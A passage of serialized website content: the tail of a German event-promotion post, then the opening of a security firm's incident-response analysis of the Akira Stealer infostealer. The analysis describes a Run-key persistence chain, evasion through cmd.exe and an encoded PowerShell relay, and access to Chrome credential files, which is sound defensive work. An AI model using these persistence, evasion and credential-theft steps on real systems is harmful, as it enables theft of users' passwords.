Schacher",[2559,13684,6703,13686,6703,13689,2557],{"className":13685},[13674],[356,13687],{"src":13688,"alt":265},"https://res.cloudinary.com/c4a8/image/upload/events/Florian.Stoeckl.648.jpg",[2559,13690,265],{"className":13691},[13681],[2559,13693,6703,13695,6703,13698,2557],{"className":13694},[13674],[356,13696],{"src":13697,"alt":164},"https://res.cloudinary.com/c4a8/image/upload/events/Jan.Geisbauer.648.png",[2559,13699,164],{"className":13700},[13681],[2559,13702],{"className":13703},[2556,8171],[2559,13705,2557,13706,8923],{},[374,13707,13712,6703,13715],{"role":7994,"className":13708,"dataText":13710,"href":13711,"target":5319},[7996,7997,7998,7999,8000,13709,8001],"cta--external","Zum Programm","https://techconference.at/agenda",[7258,13713,13710],{"className":13714},[8008],[7258,13716,13719],{"className":13717,"style":11762},[11759,11760,13718,8001],"icon--arrow-external",[11764,13720,6709,13722,6709,13727,2566],{"viewBox":13721,"width":11767,"height":11767,"padding":11768,"xmlSpace":11769,"version":11770,"xmlns":11771,"xmlns:link":11772,"style":11773},"0 0 34 34",[11779,13723],{"d":13724,"transform":13725,"style":13726},"M33.23,2.39,1.79,33.79","translate(-0.79 -0.79)","fill: none; stroke-linecap: round; stroke-linejoin: round; stroke-width: 3;",[11779,13728],{"d":13729,"transform":13725,"style":13726},"M33.79,33.79v-30a2,2,0,0,0-2-2h-30",[2559,13731],{"className":13732},[2556,8171],[2548,13734,13736],{"id":13735},"noch-ein-highlight-unser-webcast-live-aus-wien","Noch ein Highlight: unser Webcast live aus Wien.",[353,13738,9352],{},[353,13740,13741,13742,13745],{},"Kurz nach der techConference geht es direkt weiter: ",[433,13743,13744],{},"Am 12. Juni um 11:00 Uhr"," senden wir live aus Wien unseren Webcast \"Windows 365: Klartext zur Praxis und Lizenzierung\". Gemeinsam mit Andreas Leitgeb von Microsoft Österreich liefert Timo Herzig (glueckkanja) in 45 Minuten alles, was IT-Entscheider jetzt über Windows 365 wissen müssen – kompakt, verständlich, praxisnah.",[353,13747,13748],{},"Im Fokus: reale Use Cases, aktuelle Lizenzmodelle, Einsatzszenarien für Österreich – plus eine Live-Demo, wie der Einstieg mit einem Link Device in der Praxis aussieht. Im Anschluss beantworten wir live eure Fragen im Q&A.",[2559,13750,2557,13752,2557,13762,8923],{"className":13751},[13670],[2559,13753,6703,13755,6703,13759,2557],{"className":13754},[13674],[356,13756],{"src":13757,"alt":13758},"https://res.cloudinary.com/c4a8/image/upload/events/andreas-leitgeb.jpg","Andreas Leitgeb",[2559,13760,13758],{"className":13761},[13681],[2559,13763,6703,13765,6703,13769,2557],{"className":13764},[13674],[356,13766],{"src":13767,"alt":13768},"https://res.cloudinary.com/c4a8/image/upload/events/Timo.Herzig.648.jpg","Timo Herzig",[2559,13770,13768],{"className":13771},[13681],[2559,13773],{"className":13774},[2556,8171],[353,13776,13777],{},"Neugierig geworden? Dann kommt bei uns am Stand vorbei. Wir freuen uns auf den Austausch – über Cloud, Resilienz und alles, was euch sonst gerade umtreibt.",{"title":402,"searchDepth":403,"depth":403,"links":13779},[13780,13781,13782],{"id":13620,"depth":403,"text":13621},{"id":13647,"depth":403,"text":13648},{"id":13735,"depth":403,"text":13736},{"seoTitle":13784,"titleClass":7896,"date":13785,"categories":13786,"blogtitlepic":13787,"socialimg":13788,"customExcerpt":13789,"keywords":13569,"hreflang":13790,"footer":13795,"contactInContent":13796,"scripts":13815},"Wie wir bei der techConference 2025 gleich dreifach Geschichte schreiben","2025-05-25",[410],"head-tech-conference.png","/blog/heads/head-tech-conference.png","Was passiert, wenn die Cloud in Österreich landet? Wenn Tech-Entscheider, Cybersecurity-Pioniere und Microsoft-Profis aufeinandertreffen? Dann ist techConference – und wir mittendrin. Nicht nur als Platinum Partner, nicht nur mit Booth und Session. Sondern auch als offizieller Launchpartner Virtualisierung für die neue Microsoft Cloudregion Österreich.",[13791,13793],{"lang":2118,"href":13792},"/blog/corporate/2025/05/tech-conference-2025-en",{"lang":9114,"href":13794},"/blog/corporate/2025/05/tech-conference-2025-es",{"noMargin":415},{"quote":415,"infos":13797},{"bgColor":12128,"headline":13460,"subline":13461,"level":2548,"textStyling":9489,"flush":9490,"person":13798,"form":13802},{"image":13463,"cloudinary":415,"alt":144,"name":144,"quotee":144,"quoteeTitle":13464,"quote":13579,"detailsHeader":10135,"details":13799},[13800,13801],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9492,"href":10436,"icon":9506},{"ctaText":9508,"cta":13803,"method":407,"action":9511,"fields":13804},{"skin":9510},[13805,13806,13807,13808,13809,13810,13811,13812,13813,13814],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10143},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10145},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":10147},{"label":13476,"type":13030,"id":13031,"required":406,"requiredMsg":13032},{"label":13034,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":13036,"value":410},{"type":9531,"id":13038,"value":13595},{"type":9531,"id":9532,"value":13597},{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},{"slick":415},"/posts/2025-05-25-tech-conference-2025",{"title":13614,"description":402},"posts/2025-05-25-tech-conference-2025",[13056,2863],"5wS4dfs7y28WXfVxcDEEtvgGe0yaKwBnnDK8CXORNrY",{"id":13822,"title":13823,"author":13824,"body":13825,"cta":3,"description":9352,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":26191,"moment":26193,"navigation":415,"path":26273,"seo":26274,"stem":26275,"tags":26276,"webcast":406,"__hash__":26281},"content_de/posts/2025-06-16-quiet-breach.md","Inside Akira Stealer: A full technical analysis of a modular stealer",[270],{"type":350,"value":13826,"toc":26046},[13827,13832,13834,13841,13844,13862,13865,13882,13888,13891,13894,13915,13923,13934,13941,13944,13947,13962,13969,13972,13975,13987,13991,13993,13999,14003,14005,14008,14020,14029,14035,14038,14044,14047,14051,14053,14058,14064,14067,14071,14073,14076,14102,14107,14112,14116,14118,14121,14125,14127,14130,14132,14138,14141,14145,14148,14158,14161,14164,14184,14187,14194,14201,14203,14209,14212,14218,14221,14256,14259,14268,14274,14283,14286,14297,14300,14307,14309,14318,14328,14360,14366,14371,14392,14398,14401,14404,14410,14418,14425,14427,14430,14442,14445,14479,14485,14512,14521,14524,14529,14538,14540,14549,14555,14572,14575,14580,14614,14618,14621,14624,14630,14644,14650,14656,14658,14663,14667,14669,14741,14744,14748,14750,14755,14761,14766,14775,14780,14785,14796,14799,14804,14813,14819,14822,14826,14828,14839,14844,14863,14869,14878,14889,14896,14901,14905,14907,14913,14939,14942,14955,14958,14967,14970,14974,14976,14984,14987,14990,15003,15013,15020,15041,15044,15050,15054,15056,15059,15068,15080,15105,15111,15117,15120,15127,15130,15143,15150,15152,15159,15163,15165,15171,15269,15276,15283,15285,15288,15310,15313,15341,15344,15386,15389,15398,15401,15418,15424,15427,15436,15439,15453,15460,15464,15466,15473,15496,15503,15537,15540,15555,15562,15567,15578,15581,15585,15587,15590,15605,15612,15623,15634,15670,15677,15680,15684,15686,15692,15697,15737,15740,15755,15758,15767,15773,15776,15780,15782,15785,15794,15797,15844,15851,15855,15857,15863,15868,15897,15904,15906,15922,15926,15928,15931,15970,15976,15982,15986,15988,16007,16017,16024,16061,16068,16114,16122,16126,16128,16131,16159,16169,16176,16178,16183,16187,16189,16195,16199,16201,16208,16234,16241,16500,16503,16508,16511,16543,16548,16552,16554,16557,16561,16563,16566,16668,16671,16675,16677,16680,16843,16846,16869,16873,16875,16884,17127,17130,17159,17163,17165,17198,17201,17204,17235,17239,17241,17247,17252,17255,17273,17276,17284,17289,17292,17372,17380,17383,17389,17397,17401,17403,17409,17414,17417,17434,17441,17446,17453,17515,17528,17533,17539,17566,17569,17607,17610,17615,17618,17632,17636,17638,17643,17663,17670,17676,17678,17682,17684,17690,17694,17696,17700,17702,17707,17734,17740,17744,17746,17752,17769,17795,17802,17806,17808,17811,17820,17834,17837,17841,17843,17856,17859,17868,17873,17880,17882,17886,17888,17897,17901,17903,17908,17922,17937,17941,17943,18023,18026,18033,18035,18040,18098,18105,18230,18233,18378,18382,18384,18387,18441,18444,18448,18450,18457,18510,18513,18517,18519,18522,18574,18577,18581,18583,18590,18642,18645,18649,18651,18658,18699,18702,18706,18708,18715,18797,18800,18804,18806,18809,18856,18859,18863,18866,18869,18873,18875,18880,18886,18891,18897,18902,18908,18913,18919,18924,19325,19329,19331,19372,19376,19378,19386,19390,19392,19402,19407,19432,19453,19458,19545,19549,19551,19644,19647,19653,19660,19662,19665,19720,19776,19783,19785,19788,19823,19858,19865,19867,19870,19903,19938,19945,19947,19950,20019,20065,20072,20074,20077,20105,20135,20142,20144,20147,20175,20198,20208,20210,20213,20238,20276,20280,20282,20315,20319,20321,20324,20327,20330,20333,20336,20341,20366,20371,20401,20407,20416,20438,20647,20651,20653,20660,20758,20761,20765,20767,20774,20867,20877,20883,20886,20891,20897,20925,20930,20960,21013,21032,21035,21040,21089,21093,21095,21098,21102,21104,21110,21230,21249,21253,21255,21260,21334,21355,21359,21361,21364,21367,21370,21373,21472,21480,21484,21486,21491,21526,21547,21551,21553,21556,21559,21567,21570,21658,21672,21676,21678,21681,21684,21777,21783,21785,21791,21795,21797,21800,21865,21882,21885,21919,21922,21926,21928,21933,21946,21991,22017,22022,22035,22111,22166,22170,22172,22175,22181,22221,22231,22237,22247,22251,22253,22256,22285,22311,22317,22321,22323,22330,22337,22339,22345,22400,22428,22432,22434,22437,22502,22509,22548,22552,22554,22560,22575,22578,22613,22617,22619,22626,22670,22684,22690,22697,22699,22702,22706,22708,22711,22745,22748,22773,22777,22779,22784,22787,22811,22835,22839,22841,22844,22868,22872,22874,22877,22897,22901,22903,22906,22913,23026,23031,23076,23080,23082,23088,23122,23176,23181,23184,23188,23190,23193,23197,23199,23202,23208,23212,23214,23217,23272,23287,23291,23293,23304,23373,23382,23387,23390,23434,23436,23440,23442,23445,23534,23539,23668,23672,23674,23677,23682,23755,23773,23778,23798,23806,23811,23817,23832,23849,23855,23913,23931,23936,23953,23958,24003,24017,24020,24024,24026,24031,24035,24037,24044,24051,24055,24057,24168,24175,24179,24181,24187,24192,24272,24279,24286,24290,24292,24295,24324,24331,24335,24337,24341,24343,24350,24353,24356,24359,24502,24505,24509,24511,24514,24518,24520,24523,24558,24564,24568,24570,24573,24599,24602,24608,24612,24614,24619,24636,24642,24646,24648,24652,24654,24669,24693,24700,24716,24735,24738,24742,24744,24755,24759,24761,25195,25198,25202,25204,25210,25213,25216,25222,25225,25236,25242,25245,25250,25254,25256,25259,25264,25278,25282,25284,25581,25584,25588,25590,25702,25705,25709,25711,25765,25768,25772,25774,25937,25940,25944,25946,25987,25990,25994,25996,25999,26002,26005,26008,26011,26014,26019,26023,26025,26028,26031,26034,26037,26040,26043],[13828,13829,13831],"h1",{"id":13830},"prologue","Prologue",[353,13833,9352],{},[353,13835,13836,13837,13840],{},"It started like so many modern attacks do: quietly. A low-confidence Defender alert — ",[433,13838,13839],{},"\"Suspicious sequence of exploration activities\""," — surfaced during onboarding phase of a new customer into our glueckkanja Cyber Security Operations Center (CSOC).",[353,13842,13843],{},"There were no signature hits. No malware classifications. No real-time protection response. Just a single behavioral correlation in Microsoft 365 Defender, buried in the noise — and yet, unmistakably wrong.",[353,13845,13846,13847,13850,13851,13854,13855,13858,13859],{},"While triaging the alert, one specific action caught my attention: ",[3724,13848,13849],{},"python.exe"," had accessed both the ",[3724,13852,13853],{},"Login Data"," and ",[3724,13856,13857],{},"Web Data"," files inside a Chromium profile. Microsoft Defender immediately escalated this to a high-severity incident — ",[433,13860,13861],{},"\"Possible theft of passwords and other sensitive web browser information.\"",[353,13863,13864],{},"This wasn’t a false positive. It was the tip of something deeper.",[353,13866,13867,13868,13871,13872,13875,13876,13879,13880,456],{},"Tracing the telemetry backwards, I uncovered a generic startup-located binary — ",[3724,13869,13870],{},"Updater.exe"," — which spawned a NodeJS-based wrapper (",[3724,13873,13874],{},"main.exe",") that executed a command line to run a script named ",[3724,13877,13878],{},"astor.py"," via ",[3724,13881,13849],{},[3102,13883,13886],{"className":13884,"code":13885,"language":3722,"meta":402},[3720],"Updater.exe → main.exe → cmd.exe → python.exe Crypto\\Util\\astor.py\n",[3724,13887,13885],{"__ignoreMap":402},[353,13889,13890],{},"The script didn’t just scrape credentials — it executed a sequence of post-compromise reconnaissance steps, including registry queries, system fingerprinting, and privilege-aware enumeration. It operated with surgical precision, mimicking native system behavior to evade detection. And it worked — almost.",[353,13892,13893],{},"At the time of first response:",[367,13895,13896,13905,13912],{},[370,13897,13898,13900,13901,13904],{},[3724,13899,13870],{}," was flagged by only ",[433,13902,13903],{},"1 out of 69"," engines on VirusTotal.",[370,13906,13907,2454,13909,13911],{},[3724,13908,13874],{},[3724,13910,13878],{},", and all associated components were not really flagged on VirusTotal.",[370,13913,13914],{},"No files were signed. No elevated context. Just \"ordinary\" processes doing very non-ordinary things.",[353,13916,13917,13919,13920,13922],{},[3724,13918,13870],{}," didn’t touch credentials. That task was reserved for ",[3724,13921,13878],{},", the in-memory Python payload — a file that, by design, left almost no trace.",[353,13924,13925,13926,13929,13930,13933],{},"Within ",[433,13927,13928],{},"21 minutes",", the affected system was isolated from the network. Within ",[433,13931,13932],{},"70 minutes",", credentials were rotated across all affected scopes: internal identities, SaaS platforms, third-party services.",[353,13935,13936,13937,13940],{},"But the real turning point came when we extracted and fully decrypted the Python payload. What we found was not a generic stealer — it was a custom deployment of ",[433,13938,13939],{},"Akira Stealer v2",", a commercially distributed malware family sold via Telegram.",[353,13942,13943],{},"Thanks to our in-house threat intelligence and reverse engineering capabilities, we were able to reconstruct the full functionality of the malware, extract all embedded indicators, and understand its staging, exfiltration, and credential targeting logic in detail.",[353,13945,13946],{},"More importantly — we didn’t stop at technical attribution. We went further.",[353,13948,13949,13950,13953,13954,13957,13958,13961],{},"We were able to provide the client with a ",[433,13951,13952],{},"complete dataset of exfiltrated credentials",": over ",[433,13955,13956],{},"100 unique username-password combinations",", including access credentials to cloud services, CRM systems, internal platforms, and even personal tools used by key employees. The theft had been ongoing for ",[433,13959,13960],{},"months"," — and we could account for all of it.",[353,13963,13964,13965,13968],{},"Using insights gained from this case, we built a ",[433,13966,13967],{},"post-infection analysis tool"," that scans affected systems, reconstructs credential access patterns, and generates detailed forensic reports — mapping exactly what was stolen, when, and from where.",[353,13970,13971],{},"We’ll share a glimpse of that scanner at the end of this report.",[353,13973,13974],{},"Because this is more than just an incident.\nThis is how we investigate. This is how we protect.",[353,13976,13977,13984,13986],{},[433,13978,13979,13980,456],{},"Welcome to the ",[374,13981,13983],{"href":13982},"/en/security/cloud-security-operations-center/","glueckkanja CSOC",[2970,13985],{},"\nThis is how we work — because breaches don't wait.",[13828,13988,13990],{"id":13989},"_1-initial-event-and-triage-summary","1. Initial Event and Triage Summary",[353,13992,9352],{},[353,13994,13995,13996,13998],{},"On March 31, 2025, Microsoft Defender for Endpoint generated an alert labeled ",[433,13997,13839],{}," on a Windows 10 64-bit endpoint. I began the triage based on this signal and reviewed the affected system using the process tree, system timeline, and evidence correlated by Defender.",[2548,14000,14002],{"id":14001},"_11-timeline-based-triage","1.1 Timeline-Based Triage",[353,14004,10713],{},[353,14006,14007],{},"The alert pointed to a sequence of processes that warranted further inspection. During initial review, I observed the following access patterns to Chrome browser data within the local user profile:",[367,14009,14010,14015],{},[370,14011,14012],{},[3724,14013,14014],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data",[370,14016,14017],{},[3724,14018,14019],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Web Data",[353,14021,14022,14023,14025,14026,14028],{},"These accesses were initiated by a process named ",[3724,14024,13870],{},". While Microsoft Defender had not flagged the binary based on heuristic or behavioral analysis, I found a detection for ",[3724,14027,13870],{}," on VirusTotal — flagged by a single engine at that point in time.",[353,14030,14031],{},[356,14032],{"alt":14033,"src":14034},"Microsoft Defender","https://res.cloudinary.com/c4a8/image/upload/v1749797184/blog/pics/microsoft-defender.png",[353,14036,14037],{},"The full observed execution chain was as follows:",[3102,14039,14042],{"className":14040,"code":14041,"language":3722,"meta":402},[3720],"winlogon.exe\n└── userinit.exe\n    └── explorer.exe\n        └── Updater.exe\n            └── main.exe\n                └── cmd.exe /d /s /c \"python.exe Crypto\\Util\\astor.py\"\n                    └── python.exe Crypto\\Util\\astor.py\n",[3724,14043,14041],{"__ignoreMap":402},[353,14045,14046],{},"At this stage, no deeper static or dynamic analysis of the involved files had been performed. My focus was on understanding the high-level behavior and context. The process names and file paths were generic, and no suspicious command-line arguments were present beyond the chained Python execution.",[2548,14048,14050],{"id":14049},"_12-initial-response","1.2 Initial Response",[353,14052,10713],{},[353,14054,13925,14055,14057],{},[433,14056,13928],{}," of the initial alert, I initiated host isolation using Defender for Endpoint’s isolation features. The goal was to prevent potential further spread or exfiltration.",[353,14059,14060,14061,14063],{},"Within the first ",[433,14062,13932],{},", we proceeded to rotate credentials that were known to be used on the affected host — covering internal systems, SaaS platforms, and critical third-party vendors.",[353,14065,14066],{},"The reverse engineering process began after the first containment. The following sections document the technical deep dive that followed to investigate the breach.",[2548,14068,14070],{"id":14069},"_13-response-summary-fast-transparent-impact-driven","1.3 Response Summary – Fast, Transparent, Impact-Driven",[353,14072,10713],{},[353,14074,14075],{},"Our response combined speed, expertise, and operational excellence—backed by proven workflows and full visibility for the customer.",[367,14077,14078,14084,14090,14096],{},[370,14079,14080,14083],{},[433,14081,14082],{},"Detection to full containment in under 90 minutes","\nDefender alerts, network isolation, antivirus scan, and credential revocation executed rapidly and in concert.",[370,14085,14086,14089],{},[433,14087,14088],{},"Deep-dive forensic response within 48 hours","\nIncluding full disk and memory analysis, browser artifact review, credential dumping detection, and behavioral reconstruction of attacker activity.",[370,14091,14092,14095],{},[433,14093,14094],{},"Secure data recovery & evidence handling","\nThe stolen data—including cookies, passwords, tokens, and browser profiles—was recovered, forensically archived, and handed off securely to the customer.",[370,14097,14098,14101],{},[433,14099,14100],{},"End-to-end visibility and communication","\nEvery step—from first alert to remediation and debrief—was fully documented, shared in real time, and summarized in a structured CSIRT handover.",[2179,14103,14104],{},[353,14105,14106],{},"This incident showcases how glueckkanja CSOC doesn’t just stop malware—we dismantle its effects, restore control to our customers, and turn every incident into insight.",[2559,14108],{"className":14109},[14110,14111],"space-top-1","space-bottom-1",[13828,14113,14115],{"id":14114},"_2-malware-architecture-and-execution-chain-overview","2. Malware Architecture and Execution Chain Overview",[353,14117,9352],{},[353,14119,14120],{},"The malware observed on the affected endpoint followed a structured, multi-stage architecture with clear separation of responsibilities: deployment, decoding, execution, and data exfiltration.",[2548,14122,14124],{"id":14123},"_21-execution-chain-overview","2.1 Execution Chain Overview",[353,14126,10713],{},[353,14128,14129],{},"The observed execution flow was as follows:",[353,14131,13870],{},[3102,14133,14136],{"className":14134,"code":14135,"language":3722},[3720],"​   └── main.exe\n​       └── cmd.exe\n​           └── python.exe astor.py\n",[3724,14137,14135],{"__ignoreMap":402},[353,14139,14140],{},"Each component in the chain contributed to stealth, modularity, and evasion. The architecture leveraged legitimate runtimes and standard OS interpreters to bypass detection mechanisms.",[629,14142,14144],{"id":14143},"_211-origin-uncertainty-missing-initial-vector","2.1.1 Origin Uncertainty: Missing Initial Vector",[353,14146,14147],{},"{: .font-size-4}",[353,14149,14150,14151,14154,14155,456],{},"Despite extensive analysis of the post-compromise environment, the initial access vector could not be conclusively determined. This uncertainty stems primarily from the fact that the malware had remained active for an estimated ",[433,14152,14153],{},"six months prior to detection"," — exceeding the ",[433,14156,14157],{},"log retention period enforced by Microsoft Defender for Endpoint",[353,14159,14160],{},"As a result, no telemetry or forensic artifacts were available from the original time of infection. No initial process creation events, file drops, or command-line entries related to the delivery stage were recoverable from Defender’s timeline or associated sensors.",[353,14162,14163],{},"Based on contextual indicators and OSINT sources, a likely infection vector may have involved:",[367,14165,14166,14172,14178],{},[370,14167,14168,14171],{},[433,14169,14170],{},"Trojanized installers"," of cracked or modded gaming software",[370,14173,14174,14177],{},[433,14175,14176],{},"Fake utilities"," or \"performance boosters\" distributed via forums and third-party sites",[370,14179,14180,14183],{},[433,14181,14182],{},"Malicious browser extensions"," targeting specific user interests (e.g., crypto-related tools or Discord enhancements)",[353,14185,14186],{},"However, these remain speculative.",[353,14188,14189,14190,14193],{},"No confirmed dropper, phishing email, or compromised website could be identified during the investigation. While the malware architecture and execution chain were fully reconstructed, the ",[433,14191,14192],{},"initial point of compromise (MITRE ATT&CK T1190 / T1566)"," could not be validated.",[629,14195,14197,14198,14200],{"id":14196},"_212-updaterexe-initial-loader","2.1.2 ",[3724,14199,13870],{}," – Initial Loader",[353,14202,14147],{},[353,14204,14205,14206,14208],{},"When reviewing the process tree in Microsoft 365 Defender, ",[3724,14207,13870],{}," stood out immediately — not because of what it did, but because of how silently it embedded itself into the system’s execution flow.",[353,14210,14211],{},"This binary was registered for automatic execution via the standard Windows Run key:",[3102,14213,14216],{"className":14214,"code":14215,"language":3722},[3720],"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n",[3724,14217,14215],{"__ignoreMap":402},[353,14219,14220],{},"That meant it would launch every time the user logged into their session — a classic persistence mechanism that requires no elevated privileges and often slips through unnoticed in EDR telemetry.",[367,14222,14223,14229,14235,14241,14247],{},[370,14224,14225,14228],{},[433,14226,14227],{},"File Type",": Windows PE executable (32-bit)",[370,14230,14231,14234],{},[433,14232,14233],{},"Signature",": Unsigned",[370,14236,14237,14240],{},[433,14238,14239],{},"VirusTotal Detection",": 1 out of 69 engines at the time of triage",[370,14242,14243,14246],{},[433,14244,14245],{},"Execution Context",": Medium integrity, user session",[370,14248,14249,14252,14253],{},[433,14250,14251],{},"Location",": ",[3724,14254,14255],{},"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",[353,14257,14258],{},"The file itself was small, cleanly compiled, and unremarkable from a static analysis standpoint. No suspicious strings, no encrypted sections, and no indicators of obfuscation or packing. It imported only a minimal set of standard Windows API functions and contained no embedded payload.",[353,14260,14261,14262,14264,14265,14267],{},"However, its behavior was more telling. Once launched, ",[3724,14263,13870],{}," extracted an Electron application from a bundled archive — a self-contained NodeJS runtime packaged using standard Electron tooling. This unpacked folder contained an executable named ",[3724,14266,13874],{},", which was subsequently launched as a child process.",[3102,14269,14272],{"className":14270,"code":14271,"language":3722,"meta":402},[3720],"Updater.exe → main.exe\n",[3724,14273,14271],{"__ignoreMap":402},[353,14275,14276,14277,14279,14280,14282],{},"There were no network indicators at this stage, no process injection, and no anomaly in privileges or token elevation. The entire role of ",[3724,14278,13870],{}," appeared to be that of a loader — delivering a second-stage component (",[3724,14281,13874],{},") into the environment, likely with the goal of maintaining stealth and modularity.",[353,14284,14285],{},"This kind of architectural separation is common in modern commodity malware and stealer toolkits. The initial loader acts merely as a deployment stub, allowing the heavier logic — often obfuscated, interpreted, or dynamically generated — to be contained in later stages.",[353,14287,14288,14289,14291,14292,14294,14295,456],{},"In this case, ",[3724,14290,13870],{}," served precisely that purpose: a quiet initial foothold designed to blend in, remain undetected, and pave the way for the execution of the actual stealer logic in ",[3724,14293,13874],{}," and eventually ",[3724,14296,13878],{},[353,14298,14299],{},"It didn’t touch the file system beyond its own directory and didn’t trigger any behavioral rules — and yet, it was the first domino in a long and carefully constructed attack chain.",[629,14301,14303,14304,14306],{"id":14302},"_213-mainexe-obfuscated-nodejs-payload-container","2.1.3 ",[3724,14305,13874],{}," – Obfuscated NodeJS Payload Container",[353,14308,14147],{},[353,14310,14311,14312,14314,14315,14317],{},"Following the execution of ",[3724,14313,13870],{},", a second-stage binary named ",[3724,14316,13874],{}," was launched. This component presented itself as a standard Electron application — a runtime environment bundling Node.js and Chromium, often used for cross-platform desktop apps. Its innocuous nature is part of what makes it so dangerous in the wrong hands.",[353,14319,14320,14321,14323,14324,14327],{},"Upon inspection, ",[3724,14322,13874],{}," contained an internal archive named ",[3724,14325,14326],{},"app.asar"," — the standard packaging format for Electron-based applications. Unlike legitimate Electron apps, however, the contents of this archive were anything but ordinary.",[367,14329,14330,14336,14342,14350],{},[370,14331,14332,14335],{},[433,14333,14334],{},"Platform",": Electron (Node.js + Chromium)",[370,14337,14338,14341],{},[433,14339,14340],{},"Architecture",": 64-bit Windows",[370,14343,14344,14347,14348],{},[433,14345,14346],{},"Content Structure",": Embedded JavaScript files within ",[3724,14349,14326],{},[370,14351,14352,14355,14356,14359],{},[433,14353,14354],{},"Obfuscation Level",": High — achieved through ",[3724,14357,14358],{},"js-confuser",", a commercially available obfuscation toolkit for JavaScript",[353,14361,14362,14363,14365],{},"Once decompiled and deobfuscated, the core logic of ",[3724,14364,13874],{}," became evident. Its purpose was not to present a GUI or execute any frontend logic — instead, it acted as a hidden execution orchestrator.",[353,14367,14368],{},[433,14369,14370],{},"Observed Behavior:",[367,14372,14373,14376,14383],{},[370,14374,14375],{},"Decrypts and reconstructs a Base64-encoded PowerShell command stored within the JavaScript payload",[370,14377,14378,14379,14382],{},"Spawns ",[3724,14380,14381],{},"cmd.exe"," to execute the PowerShell command inline",[370,14384,14385,14386,14388,14389,8133],{},"The PowerShell command in turn invokes ",[3724,14387,13849],{},", passing in a script located under a seemingly benign directory structure (",[3724,14390,14391],{},"Crypto\\Util\\astor.py",[3102,14393,14396],{"className":14394,"code":14395,"language":3722,"meta":402},[3720],"main.exe → cmd.exe /d /s /c powershell → python.exe Crypto\\Util\\astor.py\n",[3724,14397,14395],{"__ignoreMap":402},[353,14399,14400],{},"This chaining allowed the attacker to shift execution contexts and evade straightforward detection. Because the payload was obfuscated and staged in-memory, traditional signature-based controls were ineffective.",[353,14402,14403],{},"The Electron framework provided an ideal cover — allowing execution of arbitrary JavaScript while avoiding scrutiny. JavaScript-based execution also introduced cross-platform compatibility, allowing for flexible deployment and easier integration of dynamic control logic.",[353,14405,14406,14407,14409],{},"What made ",[3724,14408,13874],{}," particularly dangerous was its ability to operate without dropping any additional files beyond what had already been staged. The stealer script was invoked directly from disk, but all staging and execution logic remained embedded within the Electron bundle.",[353,14411,14412,14413,14415,14416,456],{},"In summary, ",[3724,14414,13874],{}," served as the obfuscated, multi-layered execution core — acting as the gatekeeper between initial persistence and the full activation of the Akira Stealer payload in ",[3724,14417,13878],{},[629,14419,14421,14422,14424],{"id":14420},"_214-cmdexe-powershell-relay","2.1.4 ",[3724,14423,14381],{}," & PowerShell Relay",[353,14426,14147],{},[353,14428,14429],{},"This stage of the execution chain functioned as a relay — not for payload logic, but for obfuscation and indirection.",[353,14431,14432,14433,14435,14436,14438,14439,456],{},"After ",[3724,14434,13874],{}," completed its role of unpacking and decoding the payload, it spawned a ",[3724,14437,14381],{}," process. This process did not contain any malicious logic itself, nor did it write or modify files. Its sole purpose was to serve as a wrapper for launching a PowerShell session with an ",[433,14440,14441],{},"encoded command",[353,14443,14444],{},"This method is a well-known tactic used to reduce visibility and avoid detection:",[367,14446,14447,14459],{},[370,14448,14449,14452,14453],{},[433,14450,14451],{},"Execution Chain",":",[3102,14454,14457],{"className":14455,"code":14456,"language":3722},[3720],"main.exe → cmd.exe /d /s /c \"powershell -EncodedCommand \u003CBase64Payload>\"\n",[3724,14458,14456],{"__ignoreMap":402},[370,14460,14461,14452,14464],{},[433,14462,14463],{},"Purpose",[367,14465,14466,14469,14472],{},[370,14467,14468],{},"Encapsulates PowerShell execution within an additional shell",[370,14470,14471],{},"Hides the actual PowerShell code from direct visibility in logs",[370,14473,14474,14475,14478],{},"Evades EDRs that trigger on direct ",[3724,14476,14477],{},"powershell.exe"," usage with suspicious parameters",[353,14480,14481,14482,14484],{},"By embedding the PowerShell script as a Base64-encoded string and invoking it through ",[3724,14483,14381],{},", the attacker avoided multiple forms of detection:",[367,14486,14487,14492,14497],{},[370,14488,14489],{},[433,14490,14491],{},"Command-line heuristic filters",[370,14493,14494],{},[433,14495,14496],{},"Standard logging (e.g., Event ID 4104, 4688)",[370,14498,14499],{},[433,14500,14501,14502,14504,14505,2454,14508,14511],{},"Rule-based detections for ",[3724,14503,14477],{}," arguments like ",[3724,14506,14507],{},"-NoProfile",[3724,14509,14510],{},"-ExecutionPolicy Bypass",", or inline scripts",[353,14513,14514,14515,14517,14518,14520],{},"Notably, the PowerShell command was kept minimal and solely focused on launching ",[3724,14516,13849],{}," with a path to the embedded stealer script — ",[3724,14519,13878],{},". No additional modules were loaded, and no obvious signatures were present in memory.",[353,14522,14523],{},"This relay technique is often used in red teaming and by sophisticated infostealers alike — serving as a lightweight evasion layer that’s easy to implement but hard to catch without telemetry correlation.",[353,14525,14288,14526,14528],{},[3724,14527,14381],{}," served exactly that purpose: a simple, silent bridge between JavaScript logic and Python execution — one that almost slipped through unnoticed.",[629,14530,14532,14533,14535,14536],{"id":14531},"_215-pythonexe-with-astorpy","2.1.5 ",[3724,14534,13849],{}," with ",[3724,14537,13878],{},[353,14539,14147],{},[353,14541,14542,14543,14545,14546,14548],{},"The final and most impactful stage of the execution chain was reached when ",[3724,14544,13849],{}," invoked ",[3724,14547,13878],{}," — a Python-based, modular infostealer operating entirely in memory. This script represented the operational core of the entire attack chain.",[353,14550,14551,14552,14554],{},"Unlike many commodity stealers, ",[3724,14553,13878],{}," was not deployed in plaintext. It was protected by a multi-layered decryption mechanism:",[367,14556,14557,14566],{},[370,14558,14559,14562,14563,456],{},[433,14560,14561],{},"Decryption Stack",": The file was first GZIP-compressed and then encrypted using ",[433,14564,14565],{},"AES-256-CBC",[370,14567,14568,14571],{},[433,14569,14570],{},"Key Derivation",": A PBKDF2-based key derivation process was used (SHA-512, 1,000,000 iterations), making static analysis and brute-forcing highly impractical.",[353,14573,14574],{},"Once decrypted at runtime, the script executed several specialized 